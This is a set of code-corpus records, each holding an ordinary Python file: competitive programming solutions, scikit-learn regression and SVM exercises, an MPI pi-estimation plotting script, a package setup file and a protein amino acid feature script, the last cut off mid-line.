+{"seq_id":"459529808","text":"for i in range(int(input())):\n N = int(input())\n print('Case #%d: ' % (1+i), end='')\n digits = [str(s) for s in range(10)]\n digits_bool = [False]*10\n if N == 0:\n print('INSOMNIA')\n continue\n\n for j in range(1,1000000):\n new_num_str = str(j*N)\n #print(new_num_str)\n #print(digits_bool)\n for k, d in enumerate(digits):\n if d in new_num_str:\n digits_bool[k] = True\n if all(d for d in digits_bool):\n print(new_num_str)\n break\n\n","sub_path":"codes/CodeJamCrawler/16_0_1/tbmbob/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"154625436","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport pylab as plt\n\n'''\nFuelConsumptionCo2.csv\nN = 1067\n[MODELYEAR, MAKE, MODEL, VEHICLECLASS, ENGINESIZE, CYLINDERS, TRANSMISSION, FUELTYPE,\nFUELCONSUMPTION_CITY, FUELCONSUMPTION_HWY, FUELCONSUMPTION_COMB,\nFUELCONSUMPTION_COMB_MPG, CO2EMISSIONS]\n\n\n'''\n\n\ndf = pd.read_csv(\"/Users/patryklaskowski/Desktop/python3/projekty/fuelConsumptionCo2/fuelConsumptionCo2.csv\")\n\nprint(df.head(2))\n\nprint(\"\\nN = \", df[list(df.describe())[0]].count(), \"counted by '\", list(df.describe())[0], \"'\\n\") # returns the row count of the 1st numerical column\n\n#print(\"\\n\\nDESCRIBE:\\n\", df.describe())\n\nprint(\"Columns:\\n\", list(df.describe()), \"\\n\") # returns column names as a list\n\nprint(\"Numerical values range: \")\nfor feature in list(df.describe()): # shows range of all numerical features\n print(\"\\t\", feature, \":\", min(df[feature]), \"-\", max(df[feature]))\n\nsdf = df[['ENGINESIZE', 'CYLINDERS', 'FUELCONSUMPTION_COMB', 'CO2EMISSIONS']] # new dataframe created\nprint(\"\\n\\n\\n*NEW DATAFRAME CREATED*\\n=> \", list(sdf))\n\nsdf.hist(bins=10,color='g') # plots density of values\nplt.show()\n\nplt.scatter(sdf.ENGINESIZE, sdf.CO2EMISSIONS, color='g')\nplt.title(\"Scatterplot of CO2EMISSIONS and ENGINESIZE relation\")\nplt.ylabel(\"CO2EMISSIONS\")\nplt.xlabel(\"ENGINESIZE\")\nplt.show()\n\nplt.scatter(sdf.FUELCONSUMPTION_COMB, sdf.CO2EMISSIONS, color='g')\nplt.title(\"Scatterplot of CO2EMISSIONS and FUELCONSUMPTION_COMB relation\")\nplt.ylabel(\"CO2EMISSIONS\")\nplt.xlabel(\"FUELCONSUMPTION_COMB\")\nplt.show()\n\n\n'''\n\nSIMPLE REGRESSION MODEL\nLet's predict some data and check the results.\n\nLinear regression is going to find the best coefficients Beta_i (B1, B2, ..., Bn),\nwhich means that the residual sum of squares between x and y with these 
Betas will be the lowest.\n\n'''\n\nmask = np.random.rand(len(sdf)) < 0.8 #returns 20% of False and 80% of True statements\ntrain = sdf[mask] #all Trues (80% of data)\ntest = sdf[~mask] #all Falses (20% of data)\n\nplt.scatter(train.ENGINESIZE, train.CO2EMISSIONS, 15, color=\"black\", label=\"Train set (80%)\")\nplt.scatter(test.ENGINESIZE, test.CO2EMISSIONS, 5, color=\"orange\", label=\"Test set (20%)\")\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"CO2 Emission\")\nplt.title(\"Scatterplot of relation between CO2 Emission and Engine size\\nSplit for train and test set\")\nplt.legend()\nplt.plot()\nplt.show()\n\nfrom sklearn import linear_model\n\nregr = linear_model.LinearRegression() #initializing the Linear Regression model\ntrain_X_EngineSize = train[['ENGINESIZE']]\ntrain_Y_CO2Emissions = train[['CO2EMISSIONS']]\n'''\n#You can transform data from dataframe to array by:\ntrain_X_EngineSize = np.asanyarray(train_X_EngineSize)\ntrain_Y_CO2Emissions = np.asanyarray(train_Y_CO2Emissions)\n'''\nregr.fit(train_X_EngineSize, train_Y_CO2Emissions) #fitting the Linear Regression with given dataset\nprint('Coefficients: ', regr.coef_) #only one coef returned, this is a SIMPLE linear regression model\nprint('Intercept: ',regr.intercept_)\n\n#test_X_EngineSize = test[['ENGINESIZE']]\n#y_hat = regr.predict() #you can easily predict the data using regr.predict()\n\n\n'''\nLet's see our simple linear regression model fitted to our dataset\nit's CO2EMISSIONS based on ENGINESIZE\n'''\n\nplt.scatter(train.ENGINESIZE, train.CO2EMISSIONS, 1, color=\"g\", label=\"Train set\")\nplt.plot(train_X_EngineSize, regr.coef_[0][0]*train_X_EngineSize +regr.intercept_[0], color=\"black\", label=\"Simple linear regression\")\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\nplt.legend()\nplt.title(\"Simple linear regression model\")\nplt.show()\n\n\nfrom sklearn.metrics import r2_score\n\ntest_x = np.asanyarray(test[['ENGINESIZE']])\ntest_y = np.asanyarray(test[['CO2EMISSIONS']])\ntest_y_ = regr.predict(test_x)\n\nprint(\"\\n\\nMean absolute error: %.2f\" % np.mean(np.absolute(test_y_ - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((test_y_ - test_y) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(test_y, test_y_) ) # r2_score expects (y_true, y_pred)\n","sub_path":"fuelConsumptionCo2/fuelConsumptionCo2.py","file_name":"fuelConsumptionCo2.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"604870620","text":"# Made by: Remmi-Team\n# Refactoring to Python: Pauli Latva-Kokko and Jesper Granat\n\n# Simulation parameters\nSAMPLE_TIME = 0.01\nEND_TIME = 3000\nGRAVITATION_CONSTANT = 9.81\nBEST_INIT_SPEED = 12.9696\nBEST_END_SPEED = 35.688\n\n# FUEL PARAMETERS\nENERGY_DENSITY_MJ = 44.888 # MJ/kg \nENERGY_DENSITY_J = 43.5*10**6\nFUEL_DENSITY = 0.6871 # kg/l\n\n# Vehicle parameters\nVEHICLE_MASS = 81 # Mass of the vehicle with driver\nF_R = (VEHICLE_MASS*GRAVITATION_CONSTANT)/3 # Radial force acting on each wheel, assuming the weight is split evenly over the three wheels\nDRAG_COEF = 0.11 # Used for calculating the drag of the vehicle.\nFRONT_AREA = 0.35 # Frontal area of the vehicle. Used for calculating the drag of the vehicle.\nRHO = 1.2\nENGINE_TORQUE = 3.15\nENGINE_EFFICIENCY = 0.30\nFRONT_SPROCKET = 141\nREAR_SPROCKET = 18\nDRIVE_RATIO = REAR_SPROCKET / FRONT_SPROCKET\nROLLING_RESISTANCE_COEF = 0.001\nTYRE_DIAMETER = 0.48\nBEARING_DISTANCE = 0.025 # Meters, Distance between the bearings on front wheel hub. 
Used for bearing force calculation.\n\n# Strategy parameters\n\n\n# Event parameters\nTOTAL_LAPS = 11","sub_path":"Remmi-Team_projektit/Vehicle_performance-simulator/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499052091","text":"'''\r\nCreated on 22.10.2019\r\n\r\n@author: marc_bussjaeger\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get_trials_from_experiment_data(experiment_data):\r\n    data = experiment_data.split(\",\")[0].split(\"trials = \")[1]\r\n    return int(data)\r\n\r\ndef get_estimate_from_experiment_data(experiment_data):\r\n    data = experiment_data.split(\"pi is \")[1].split(\"\\nThe\")[0]\r\n    return float(data)\r\n\r\ndef get_seconds_from_experiment_data(experiment_data):\r\n    data = experiment_data.split(\"took \")[1].split(\" seconds\")[0]\r\n    return float(data)\r\n\r\ndef outfile_parser(outfile_path):\r\n    # parse the txt into a list of runs that contains experiment dicts\r\n    f = open(outfile_path, \"r\")\r\n    data = f.read()\r\n    f.close()\r\n    data = data.replace(\"\\r\",\"\").split(\"finish.\")\r\n    \r\n    runs = [] # a run consists of 9 experiments\r\n    run = []\r\n    for i, experiment_data in enumerate(data[:-1]):\r\n        if i%9==0:\r\n            if len(run) != 0:\r\n                runs.append(run)\r\n                run = []\r\n        experiment = {\r\n            \"trials\":get_trials_from_experiment_data(experiment_data),\r\n            \"estimate\":get_estimate_from_experiment_data(experiment_data),\r\n            \"seconds\":get_seconds_from_experiment_data(experiment_data)\r\n        }\r\n        run.append(experiment)\r\n    runs.append(run)\r\n    return runs\r\n\r\ndef accumulate_data(runs):\r\n    # return the mean and stddev of the runs\r\n    result = runs[0]\r\n    for i, result_exp in enumerate(result):\r\n        trials = result_exp[\"trials\"]\r\n        estimate_list = []\r\n        second_list = []\r\n        for run in runs:\r\n            for exp in run:\r\n                if exp['trials']==trials:\r\n                    estimate_list.append(exp[\"estimate\"])\r\n                    second_list.append(exp[\"seconds\"])\r\n        result[i][\"estimate\"] = np.mean(estimate_list)\r\n        result[i][\"estimate_uncert\"] = np.std(estimate_list)\r\n        result[i][\"seconds\"] = np.mean(second_list)\r\n        result[i][\"seconds_uncert\"] = np.std(second_list)\r\n    return result\r\n\r\ndef sort_for_plotting(result):\r\n    # sort the accumulated data for plotting\r\n    trials = []\r\n    estimates = []\r\n    estimate_uncerts = []\r\n    seconds = []\r\n    seconds_uncerts = []\r\n    \r\n    for exp in result:\r\n        trials.append(exp[\"trials\"])\r\n        estimates.append(exp[\"estimate\"])\r\n        estimate_uncerts.append(exp[\"estimate_uncert\"])\r\n        seconds.append(exp[\"seconds\"])\r\n        seconds_uncerts.append(exp[\"seconds_uncert\"])\r\n    return [trials, estimates, estimate_uncerts, seconds, seconds_uncerts]\r\n\r\n\r\n# get the data\r\nseq_runs = outfile_parser(\"./output_seq\")\r\nmpi_runs_16 = outfile_parser(\"./output_mpi\")\r\nmpi_runs_8 = outfile_parser(\"./output_mpi_8\")\r\nmpi_runs_4 = outfile_parser(\"./output_mpi_4\")\r\n\r\nseq_result = accumulate_data(seq_runs)\r\nmpi_result_16 = accumulate_data(mpi_runs_16)\r\nmpi_result_8 = accumulate_data(mpi_runs_8)\r\nmpi_result_4 = accumulate_data(mpi_runs_4)\r\n\r\nseq_plot_data = sort_for_plotting(seq_result)\r\nmpi_plot_data_16 = sort_for_plotting(mpi_result_16)\r\nmpi_plot_data_8 = sort_for_plotting(mpi_result_8)\r\nmpi_plot_data_4 = sort_for_plotting(mpi_result_4)\r\n\r\n\r\n# plot the estimate data\r\nax = plt.gca()\r\nax.errorbar(seq_plot_data[0], np.array(seq_plot_data[1])-np.pi, 
yerr=seq_plot_data[2],fmt=\".\", label=\"sequential\")\r\nax.errorbar(mpi_plot_data_16[0], np.array(mpi_plot_data_16[1])-np.pi, yerr=mpi_plot_data_16[2],fmt=\".\", label=\"16 ranks\")\r\nax.errorbar(mpi_plot_data_8[0], np.array(mpi_plot_data_8[1])-np.pi, yerr=mpi_plot_data_8[2],fmt=\".\", label=\"8 ranks\")\r\nax.errorbar(mpi_plot_data_4[0], np.array(mpi_plot_data_4[1])-np.pi, yerr=mpi_plot_data_4[2],fmt=\".\", label=\"4 ranks\")\r\nax.set_xlabel(\"trials\")\r\nax.set_ylabel(r\"$\\pi_{\\mathrm{estimate}}-\\pi$\")\r\nplt.xscale('log')\r\nlegend = ax.legend()\r\nplt.show()\r\n\r\n\r\n# plot the seconds data\r\nax = plt.gca()\r\nax.errorbar(seq_plot_data[0], np.array(seq_plot_data[3]), yerr=seq_plot_data[4],fmt=\".\", label=\"sequential\")\r\nax.errorbar(mpi_plot_data_16[0], np.array(mpi_plot_data_16[3]), yerr=mpi_plot_data_16[4],fmt=\".\", label=\"16 ranks\")\r\nax.errorbar(mpi_plot_data_8[0], np.array(mpi_plot_data_8[3]), yerr=mpi_plot_data_8[4],fmt=\".\", label=\"8 ranks\")\r\nax.errorbar(mpi_plot_data_4[0], np.array(mpi_plot_data_4[3]), yerr=mpi_plot_data_4[4],fmt=\".\", label=\"4 ranks\")\r\nax.set_xlabel(\"trials\")\r\nax.set_ylabel(\"time / s\")\r\nplt.xscale('log')\r\nplt.yscale('log')\r\nlegend = ax.legend()\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"proseminar/02/monte_carlo_method/pi_evaluation.py","file_name":"pi_evaluation.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"248705493","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import linear_model, svm\nfrom sklearn.metrics import roc_curve, auc\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main():\n # Read raw data.\n # https://s3-eu-west-1.amazonaws.com/static.oc-static.com/prod/courses/files/Parcours_data_scientist/entrainez-un-modele-predictif-lineaire/TP_2_datset_mushrooms.csv\n raw_data = pd.read_csv('mushrooms_dataset.csv')\n print('raw_data :\\n', raw_data.head())\n\n # Convert letters to numbers : machine learning algorithms works only on numbers.\n labelencoder=preprocessing.LabelEncoder()\n for col in raw_data.columns:\n raw_data[col] = labelencoder.fit_transform(raw_data[col])\n print('converted raw_data :\\n', raw_data.head())\n\n # Extract data from dataset.\n x = raw_data.iloc[:, 1:23] # Dataset: variables.\n y = raw_data.iloc[:, 0] # Dataset: labels.\n print('x :\\n', x.head())\n print('y :\\n', y.head())\n\n # Scale data to reduce weights.\n # https://openclassrooms.com/fr/courses/4444646-entrainez-un-modele-predictif-lineaire/4507801-reduisez-l-amplitude-des-poids-affectes-a-vos-variables\n std_scale = preprocessing.StandardScaler().fit(x)\n x_scaled = std_scale.transform(x)\n\n # Split data set into training set and testing set.\n # https://openclassrooms.com/fr/courses/4011851-initiez-vous-au-machine-learning/4020631-exploitez-votre-jeu-de-donnees\n x_train, x_test, y_train, y_test = train_test_split(x_scaled, y, test_size=0.3)\n\n # Change the hyperparameters of the model to find the best one, compare different models (with/without regularization).\n models = []\n models.append((linear_model.LogisticRegression(solver = 'liblinear'), 'logistic reg'))\n models.append((svm.LinearSVC(loss='hinge'), 'SVM'))\n _, all_axis = plt.subplots(1, 2)\n for idx_model, model_lbl in enumerate(models):\n # Train a model.\n model, lbl = model_lbl[0], model_lbl[1]\n axis = 
all_axis.ravel()[idx_model]\n for p in ['l1', 'l2']:\n # Set parameter model.\n model.set_params(penalty=p)\n if p == 'l1' and isinstance(model, svm.LinearSVC):\n continue # Not supported.\n for c in np.logspace(-3, 3, 7): # c coefficient between 10^-3 and 10^3.\n # Set parameter model.\n model.set_params(C=c)\n # Feed the model.\n model.fit(x_train,y_train)\n # Get prediction for positive value\n y_prob = None\n if isinstance(model, linear_model.LogisticRegression):\n y_prob = model.predict_proba(x_test)[:,1]\n if isinstance(model, svm.LinearSVC):\n y_prob = model.predict(x_test)\n # Compute ROC curve.\n # https://openclassrooms.com/fr/courses/4297211-evaluez-les-performances-dun-modele-de-machine-learning/4308261-evaluez-un-algorithme-de-classification-qui-retourne-des-scores\n false_positive_rate, true_positive_rate, thresholds = roc_curve(y_test, y_prob)\n roc_auc = auc(false_positive_rate, true_positive_rate)\n # Plot ROC to identify the best binary classifier.\n axis.set_title('Receiver Operating Characteristic')\n axis.plot(false_positive_rate,true_positive_rate, label='%s - C %08.3f - penalty %s - AUC = %0.5f'%(lbl, c, p, roc_auc))\n axis.set_ylabel('True Positive Rate')\n axis.set_xlabel('False Positive Rate')\n # Plot random binary classifier.\n axis.plot([0, 1], [0, 1], linestyle='--', label='random binary classifier', color='k')\n axis.legend(loc = 'lower right')\n plt.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9, wspace=0.3, hspace=0.3)\n plt.show()\n\nif __name__ == '__main__':\n # https://openclassrooms.com/fr/courses/4444646-entrainez-un-modele-predictif-lineaire/4507851-tp-entrainez-une-regression-logistique-et-une-svm-lineaire\n main()\n","sub_path":"1.supervised/2.classification/1.linear/mushrooms.py","file_name":"mushrooms.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"158155040","text":"#! 
/usr/bin/env python\n# -*- mode: python; coding: utf-8 -*-\n# Copyright 2020 the .NET Foundation\n# Distributed under MIT License\n\nimport io\nfrom setuptools import setup\n\nwith io.open('README.md', encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nsetup_args = dict(\n name = 'wwt_aligner', # cranko project-name\n version = '0.dev0', # cranko project-version\n description = 'Align RGB images to FITS images using Astrometry.net',\n long_description = LONG_DESCRIPTION,\n long_description_content_type = 'text/markdown',\n url = 'https://github.com/WorldWideTelescope/wwt-aligner',\n license = 'MIT',\n platforms = 'Linux, Mac OS X, Windows',\n\n author = 'AAS WorldWide Telescope Team',\n author_email = 'wwt@aas.org',\n\n classifiers = [\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n\n packages = [\n 'wwt_aligner',\n 'wwt_aligner.tests',\n ],\n\n entry_points = {\n 'console_scripts': [\n 'wwt-aligner-agent=wwt_aligner.agent_cli:entrypoint',\n ]\n },\n\n install_requires = [\n 'astropy>=4',\n 'pyavm>=0.9',\n 'sep>=1.1',\n 'toasty>=0.4',\n ],\n\n extras_require = {\n 'test': [\n 'pytest',\n 'pytest-cov>=2.6.1',\n ],\n 'docs': [\n 'astropy-sphinx-theme',\n 'numpydoc',\n 'sphinx>=1.6',\n 'sphinx-automodapi',\n ],\n },\n)\n\nif __name__ == '__main__':\n setup(**setup_args)\n","sub_path":"backend/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"635642515","text":"#!/usr/bin/env python3\n\ndef testCase(base):\n n = len(base)\n pos = 0\n buf = ''\n curL = -1\n while curL != 0:\n k = 3 if curL == -1 else curL\n while pos + k > len(buf):\n buf += input()\n if curL == -1:\n curL = int(buf[pos : pos+k], 2)\n else:\n x = int(buf[pos : pos+k], 2)\n if x == (1 << curL) - 1:\n curL = -1\n else:\n print(base[(1 << curL) - (curL + 1) + x], end='')\n pos += k\n print()\n\n\ndef main():\n while True:\n try:\n lin = input()\n except:\n break\n testCase(lin)\n\n\nmain()\n","sub_path":"UVa/UVa_00213.py","file_name":"UVa_00213.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"426835407","text":"import pandas\nimport numpy as np\nfrom sklearn import model_selection\nfrom sklearn import preprocessing\nfrom sklearn import svm\n\n# 1. Loading data\ndata_frame = pandas.read_csv('german.data', sep=' ')\ndata_frame.replace('NA', -1000000, inplace=True)\n\n# 2. 
Label encoding\nlabels = {\n 'CheckingAccountStatus': ['A11', 'A12', 'A13', 'A14'],\n 'CreditHistory': ['A30', 'A31', 'A32', 'A33', 'A34'],\n 'CreditPurpose': ['A40', 'A41', 'A42', 'A43', 'A44', 'A45', 'A46', 'A47', 'A48', 'A49', 'A410'],\n 'SavingsAccount': ['A61', 'A62', 'A63', 'A64', 'A65'],\n 'EmploymentSince': ['A71', 'A72', 'A73', 'A74', 'A75'],\n 'PersonalStatusSex': ['A91', 'A92', 'A93', 'A94', 'A95'],\n 'OtherDebtors': ['A101', 'A102', 'A103'],\n 'Property': ['A121', 'A122', 'A123', 'A124'],\n 'OtherInstallmentPlans': ['A141', 'A142', 'A143'],\n 'Housing': ['A151', 'A152', 'A153'],\n 'Job': ['A171', 'A172', 'A173', 'A174'],\n 'Phone': ['A191', 'A192'],\n 'ForeignWorker': ['A201', 'A202']\n}\nlabel_encoders = {}\ndata_frame_encoded = pandas.DataFrame()\n\nfor column in data_frame:\n if column in labels:\n label_encoders[column] = preprocessing.LabelEncoder()\n label_encoders[column].fit(labels[column])\n data_frame_encoded[column] = label_encoders[column].transform(\n data_frame[column])\n else:\n data_frame_encoded[column] = data_frame[column]\n\n# 3. Identification of features and labels\nfeatures = np.array(data_frame_encoded.drop(['CreditScore'], 1))\nlabel = np.array(data_frame_encoded['CreditScore'])\n\n# 4. Scaling features\nscaled_features = preprocessing.MinMaxScaler(\n feature_range=(0, 1)).fit_transform(features)\n\n# 5. Splitting training and testing data\nfeatures_train, features_test, label_train, label_test = model_selection.train_test_split(\n scaled_features,\n label,\n test_size=0.2\n)\n\n\n# A. Linear kernel\nclassifier = svm.SVC(kernel=\"linear\")\nclassifier.fit(features_train, label_train)\nprint('Linear kernel score: ', classifier.score(features_test, label_test))\nprint('\\n')\n\n# B. Polynomial kernel of degree 4, C=2, gamma=0.05\nclassifier = svm.SVC(kernel=\"poly\", C=2, degree=4, gamma=0.05)\nclassifier.fit(features_train, label_train)\nprint('Polynomial kernel score (degree 4, C=2, gamma=0.05): ',\n classifier.score(features_test, label_test))\nprint('\\n')\n\n# C. Polynomial kernel of degree 4, C=2, gamma=0.25\nclassifier = svm.SVC(kernel=\"poly\", C=2, degree=4, gamma=0.25)\nclassifier.fit(features_train, label_train)\nprint('Polynomial kernel score (degree 4, C=2, gamma=0.25):',\n classifier.score(features_test, label_test))\nprint('\\n')\n\n# D. Polynomial kernel of degree 4, C=2, gamma=0.5\nclassifier = svm.SVC(kernel=\"poly\", C=2, degree=4, gamma=0.5)\nclassifier.fit(features_train, label_train)\nprint('Polynomial kernel score (degree 4, C=2, gamma=0.5):',\n classifier.score(features_test, label_test))\nprint('\\n')\n\n# E. Sigmoid kernel\nclassifier = svm.SVC(kernel=\"sigmoid\")\nclassifier.fit(features_train, label_train)\nprint('Sigmoid kernel score:', classifier.score(features_test, label_test))\nprint('\\n')\n\n# F. 
Default kernel with a gamma of 0.15\nclassifier = svm.SVC(kernel=\"rbf\", gamma=0.15)\nclassifier.fit(features_train, label_train)\nprint('Default kernel with a gamma of 0.15 score:',\n      classifier.score(features_test, label_test))\n","sub_path":"Chapter13/Activity 09 Support Vector Machine Optimization in scikit-learn/credit_scoring.py","file_name":"credit_scoring.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"624932696","text":"import random\ndef generar_lista(cantidad, inicio, fin):\n    lista = []\n    for i in range(cantidad):\n        valor = random.randint(inicio, fin)\n        lista.append(valor)\n    return lista\n\ndef obtener_pares(lista):\n    res = []\n    for i in range(len(lista)):\n        if(lista[i] % 2 == 0):\n            res.append(lista[i])\n    return res\n\nif __name__ == \"__main__\":\n    lista = generar_lista(100, 0, 9)\n    lista_pares = obtener_pares(lista)\n    print(lista)\n    print(lista_pares)","sub_path":"s072-guia09/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"72813425","text":"# adding features to the merged dataframe\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\n\nfrom Bio.Seq import Seq\nfrom Bio import SeqIO\n\ndata_all = pd.read_csv('/Users/Graceyh/Google Drive/AboutDissertation/Data/ProteinDataAll_correct.csv')\nprint(data_all.head())\n# in the same order as the amino acids in AAindex\nfreq_AA =['freq_A','freq_R','freq_N','freq_D','freq_C','freq_Q','freq_E','freq_G','freq_H','freq_I','freq_L','freq_K','freq_M','freq_F','freq_P','freq_S','freq_T','freq_W','freq_Y','freq_V']\nprint(len(freq_AA))\nperc_AA =['perc_A','perc_R','perc_N','perc_D','perc_C','perc_Q','perc_E','perc_G','perc_H','perc_I','perc_L','perc_K','perc_M','perc_F','perc_P','perc_S','perc_T','perc_W','perc_Y','perc_V']\nAA =['A','R','N','D','C','Q','E','G','H','I','L','K','M','F','P','S','T','W','Y','V']\n\ndef calAAFreq(seq,AA):\n    # seq: vector of sequence objects in biopython\n    # AA: abbreviation of amino acid (string: \"A\")\n    freq_AA = seq.map(lambda x: x.count(AA))\n    return freq_AA\n\ndef calAAPerc(seq,AA):\n    # seq: vector of sequence objects in biopython\n    # AA: abbreviation of amino acid (string: \"A\")\n    # return the amino acid composition of sequences as a percentage (fraction * 100)\n\n    # seq_length: corresponding length vector of the sequences\n    seq_length = seq.map(lambda x: len(x))\n    perc_AA = calAAFreq(seq,AA).divide(seq_length)* 100\n    return perc_AA\n\n# # add frequencies of amino acid as features to the dataframe\n# for i in range(0,20):\n#     data_all[freq_AA[i]] = calAAFreq(data_all['sequence'],AA[i])\n\n# add composition of amino acid as features to the dataframe\nfor j in range(0,20):\n    data_all[perc_AA[j]] = calAAPerc(data_all['sequence'],AA[j])\n\nprint(data_all.head())\nprint(data_all.columns)\ndata_all.to_csv(\"/Users/Graceyh/Desktop/ABDataPerc_correct.csv\",index=False)\n# data_all.to_csv(\"/Users/Graceyh/Desktop/ABDataFreqcorrect.csv\",index=False)\n\n#-----------------------------------------------------------------------------#\n# # build a dataframe that contains only the frequencies of each amino acid and output it to csv for later calculation\n# data_Abridged.drop(data_Abridged.columns[[0,1,2,3]],axis=1,inplace=True)\n# data_Abridged.to_csv(\"/Users/Graceyh/Google Drive/AboutDissertation/Data/ProteinDataAll(Abridged_AA_correct).csv\")\n# #\n# store a dataframe of amino acid percentage in each 
sequence for later calculation\ndf_AA = data_all.copy()\ndf_AA.drop(df_AA.columns[[0,1,2,3]],axis=1,inplace=True)\ndf_AA.to_csv(\"/Users/Graceyh/Google Drive/AboutDissertation/Data/ProteinAAperc_correct.csv\",index=False)\nprint(df_AA.columns)\n\n#-----------------------------------------------------------------------------#\n\n# use properties of amino acid as features\n\n# Hydrophobicity index (Argos et al., 1982), Eur. J. Biochem. 128, 565-575 (1982)\nhydrophobicity = [0.61, 0.60, 0.06, 0.46, 1.07, 0.0, 0.47, 0.07, 0.61, 2.22,1.53, 1.15, 1.18, 2.02, 1.95, 0.05, 0.05, 2.65, 1.88, 1.32]\n# Size (Dawson, 1972), In \"The Biochemical Genetics of Man\" (Brock, D.J.H. and Mayo, O., eds.),Academic Press, New York, pp.1-38 (1972)\nsize = [2.5, 7.5, 5.0, 2.5, 3.0, 6.0, 5.0, 0.5, 6.0, 5.5, 5.5, 7.0, 6.0, 6.5, 5.5, 3.0, 5.0, 7.0, 7.0, 5.0]\n# Average volumes of residues (Pontius et al., 1996), J. Mol. Biol 264, 121-136 (1996) (Disulfide bonded cysteine, 102.4)\nvolume = [91.5, 196.1, 138.3, 135.2, 114.4, 156.4, 154.6, 67.5, 163.2, 162.6, 163.4, 162.5, 165.9, 198.8, 123.4, 102.0, 126.0, 209.8, 237.2, 138.4]\n\n# Net charge (Klein et al., 1984), Biochim. Biophys. Acta 787, 221-226 (1984)\nnetCharge = [0, 1, 0, -1, 0, -1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# Average flexibility indices (Bhaskaran-Ponnuswamy, 1988),Int. J. Peptide Protein Res. 32, 241-255 (1988)\navgFlexibility = [0.357, 0.529, 0.463, 0.511, 0.346, 0.493, 0.497, 0.544, 0.323, 0.462, 0.365, 0.466, 0.295, 0.314, 0.509, 0.507, 0.444, 0.305, 0.420, 0.386]\n\n# solvent accessibility, Information value for accessibility; average fraction 35% (Biou et al., 1988), Protein Engineering 2, 185-191 (1988)\nsolvAccess = [16, -70, -74, -78, 168, -73, -106, -13, 50, 151,145, -141, 124, 189, -20, -70, -38, 145, 53, 123]\n\n# Proportion of residues 95% buried (Chothia, 1976), The nature of the accessible and buried surfaces in proteins, J. Mol. Biol. 
105, 1-14 (1976)\nburiedProportion= [0.38, 0.01, 0.12, 0.15, 0.45, 0.07, 0.18, 0.36, 0.17, 0.60, 0.45, 0.03, 0.40, 0.50, 0.18, 0.22, 0.23, 0.27, 0.15, 0.54]\n\n# Ratio of buried and accessible molar fractions (Janin, 1979), Surface and inside volumes in globular proteins, Nature 277, 491-492 (1979)\nburiedRatio = [1.7, 0.1, 0.4, 0.4, 4.6, 0.3, 0.3, 1.8, 0.8, 3.1, 2.4, 0.05, 1.9, 2.2, 0.6, 0.8, 0.7, 1.6, 0.5, 2.9]\n# Solvation free energy (Eisenberg-McLachlan, 1986), Solvation energy in protein folding and binding, Nature 319, 199-203 (1986)\nsolvationFreeEnergy = [0.67, -2.1, -0.6, -1.2, 0.38, -0.22, -0.76,0, 0.64, 1.9, 1.9, -0.57, 2.4, 2.3, 1.2, 0.01, 0.52, 2.6, 1.6, 1.5]\n\n# calculate entropy of protein sequence to denote the sequence complexity\ndef entropy(row):\n    return stats.entropy(row, base = 2)\n\n#-----------------------------------------------------------------------------#\n# add average hydrophobicity and sum of size as features\ndata_all['avg_hydrophobicity'] = df_AA.dot(hydrophobicity).divide(data_all['length'])\ndata_all['sum_size'] = df_AA.dot(size)\ndata_all['sum_volume'] = df_AA.dot(volume)\ndata_all['sum_netCharge'] = df_AA.dot(netCharge)\ndata_all['avg_Flexibility'] = df_AA.dot(avgFlexibility).divide(data_all['length'])\ndata_all['avg_solvAccess'] = df_AA.dot(solvAccess).divide(data_all['length'])\n# buriedProportion measures the same property as buriedRatio, so keep only one of them\ndata_all['avg_buriedProportion'] = df_AA.dot(buriedProportion).divide(data_all['length'])\n# data_all['avg_buriedRatio'] = df_AA.dot(buriedRatio).divide(data_all['length'])\ndata_all['solvationFreeEnergy'] =df_AA.dot(solvationFreeEnergy)\n\ndata_all['entropy']=df_AA.apply(lambda row: entropy(row),axis = 1)\nprint(data_all['entropy'])\n\nprint(\"----------------------------------------------------------------------\")\nprint(data_all.head())\nprint(data_all.columns)\ndata_all.to_csv(\"/Users/Graceyh/Desktop/AbData(allfeature)).csv\",index = 